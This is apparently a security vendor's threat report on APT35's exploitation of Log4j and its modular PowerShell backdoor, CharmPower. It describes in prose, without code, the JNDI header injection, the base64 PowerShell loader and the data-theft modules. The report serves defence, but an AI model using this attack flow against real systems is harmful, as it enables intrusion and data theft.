With the popularity of Log4j security vulnerability, multiple threat actors, mostly financially motivated, added it to their exploitation arsenal. It comes as no surprise that some nation-sponsored actors also saw this new vulnerability as an opportunity to strike before potential targets have identified and patched the affected systems.
APT35 which is suspected to be an Iranian nation-state actor, started widespread scanning, and attempts to leverage Log4j flaw in publicly facing systems only four days after the vulnerability was disclosed.
A new modular PowerShell-based framework dubbed CharmPower, used to establish persistence, gather information, and execute commands. The attackers chose one of the publicly available open-source JNDI Exploit Kits, since removed from GitHub due to its enormous popularity following the vulnerability emergence.
To exploit the vulnerable machine, the attackers send a crafted request to the victim’s publicly facing resource. In this case, the payload was sent in the User-Agent or HTTP Authorization headers. After successful exploitation, the exploitation server builds and returns a malicious Java class to be executed on a vulnerable machine. This class runs a PowerShell command with a base64-encoded payload: It eventually downloads a PowerShell module from an Amazon S3 bucket URL
CharmPower: PowerShell-based modular backdoor
The downloaded PowerShell payload is the main module responsible for basic communication with the C&C server and the execution of additional modules received. The main module performs the following operations:
- Validate network connection
- Basic system enumeration
- Retrieve C&C domain.
- Receive, decrypt, and execute follow-up modules.
The core module keeps sending HTTP POST requests to the C2 that either go unanswered or receive a Base64 string which initiates the downloading of an additional PowerShell or C# module.’CharmPower’ is responsible for decrypting and loading these modules, and these then establish an independent channel of communication with the C2.
The list of modules to be sent to the infected endpoint is generated automatically based on the basic system data retrieved by CharmPower during the reconnaissance phase.
Every module is auto generated by the attackers based on the data sent by the main module: each of the modules contains a hardcoded machine name and a hardcoded C&C domain.
All the modules we observed contain shared code responsible for:
- Encrypting the data.
- Exfiltrating gathered data through a POST request or by uploading it to an FTP server.
- Sending execution logs to a remote server.
Each module performs some specific job. We managed to retrieve and analyse the next modules:
- List installed applications.
- Take screenshots.
- List running processes.
- Get OS and computer information.
- Execute a predefined command from the C&C.
- Clean up any traces created by different modules.
- All the servers we observed in this campaign are hosted by OVH SAS and Hetzner Online GmbH.
- When we investigated the infrastructure, one of the C&C servers found responded with modules that use 127.0.0.1 as a C&C server. suggests that the PowerShell-based malware is still under active development.
- The time it takes the C&C server to respond with a module, and the module type it responds with, differs significantly between victims.
Every time there is a new published critical vulnerability, the entire Security community holds its breath until its worst fears come true: scenarios of real-world exploitation, especially by state-sponsored actors. As we showed in this article, the wait in case of Log4j vulnerability was only a few days. The combination of its simplicity, and the widespread number of vulnerable devices, made this a very attractive vulnerability for actors such as APT35.
Indicators of Compromise